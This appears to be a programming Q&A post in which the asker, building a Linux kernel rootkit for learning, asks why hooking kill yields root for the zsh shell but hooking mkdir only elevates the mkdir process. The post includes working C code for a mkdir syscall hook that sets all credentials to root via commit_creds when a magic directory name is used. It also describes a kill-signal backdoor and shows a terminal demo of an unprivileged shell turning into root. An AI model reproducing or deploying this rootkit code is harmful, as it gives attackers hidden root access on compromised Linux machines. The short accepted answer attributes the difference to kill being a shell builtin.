# why when hooking syscalls from the kernel, is the pid of kill, zsh, but the pid of mkdir is mkdir?

Tags: linux, kernel, process, kill, mkdir

I am writing my own rootkit to learn about Linux kernels. I wanted to hook into a syscall and alter the credentials of the current task to be that of roots (i.e.euid=0). I saw you could do this with unused signals when running kill. If you hooked into kill you could grab the signal, check if it matches the one you set, and then run your function to alter the credentials giving the current user root.

However, this does not work when hooking into other syscalls like mkdir. This is because the current process when running mkdir is mkdir itself. However, the current process when running kill, is my zsh shell, therefore giving me root.

I wanted to get root when hooking mkdir but for the reasons mentioned above, this doesn't work and only changes mkdir to run as root, not my zsh instance.

I was reading some pages from LWN (https://static.lwn.net/images/pdf/LDD3/ch02.pdf) and it says "During the execution of a system call, such as open or read, the current process is the one that invoked the call." That leads me to believe the current process of mkdir should be zsh, as that is the process that invoked the call.

Here is my code hooking into mkdir

```c
static asmlinkage long (*orig_mkdir)(const struct pt_regs *);

asmlinkage int fh_sys_mkdir(const struct pt_regs *regs)
{
    void set_root(void);

    printk(KERN_INFO "Intercepting mkdir call");
    
    char __user *pathname = (char *)regs->di;
    char dir[255] = {0};

    long err = strncpy_from_user(dir, pathname, 254);

    
    if (err > 0)
        {
        printk(KERN_INFO "rootkit: trying to create directory with name: %s\n", dir);
        }
        


    if ( (strcmp(dir, "GetR00t") == 0) )
        {
            //execl(SHELL, "sh", NULL);
            printk(KERN_INFO "rootkit: giving root...\n");
            set_root();
            return 0;
        }

    printk(KERN_INFO "ORIGINAL CALL");
    return orig_mkdir(regs);
    
}
```

Here is how I am altering the credentials to achieve root.

```c
void set_root(void)
      {
           printk(KERN_INFO "set_root called");
           printk(KERN_INFO "The process is \"%s\" (pid %i)\n", current->comm, current->pid);

           struct cred *root;
           root = prepare_creds();
           
           if (root == NULL)
           {
               printk(KERN_INFO "root is NULL");
               return;
           }

            printk(KERN_INFO "Setting privileges... ");
           /* Run through and set all the various *id's of the current user and set them all to 0 (root) */
            root->uid.val = root->gid.val = 0;
            root->euid.val = root->egid.val = 0;
            root->suid.val = root->sgid.val = 0;
            root->fsuid.val = root->fsgid.val = 0;


           /* Set the credentials to root */
           printk(KERN_INFO "Commiting creds");
           commit_creds(root);

      }
```

Here is the logs showing the pid when i run kill and when i run mkdir:

```bsh
$ sudo tail /var/log/syslog 
[...SNIP...]
Jan 22 10:44:43 kali kernel: [ 6170.003662] The process is "mkdir" (pid 3338) //PID of current process when mkdir is ran
Jan 22 10:46:14 kali kernel: [ 6260.534752] The process is "zsh" (pid 1396) // PID of current process when kill is ran
```

Here is a demo of how it works:

```bsh
┌──(kali㉿kali)-[~/Documents]
└─$ mkdir GetR00t            
                                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Documents]
└─$
----------------------------------------
┌──(kali㉿kali)-[~/Documents]
└─$ kill -64 1
                                                                                                                                                                                                                                                              
┌──(rootkali)-[~/Documents]
└─#
```

Answer (score 0, accepted):

The `kill` command is built into `zsh`, therefore that is the process involved. `mkdir` is a separate command.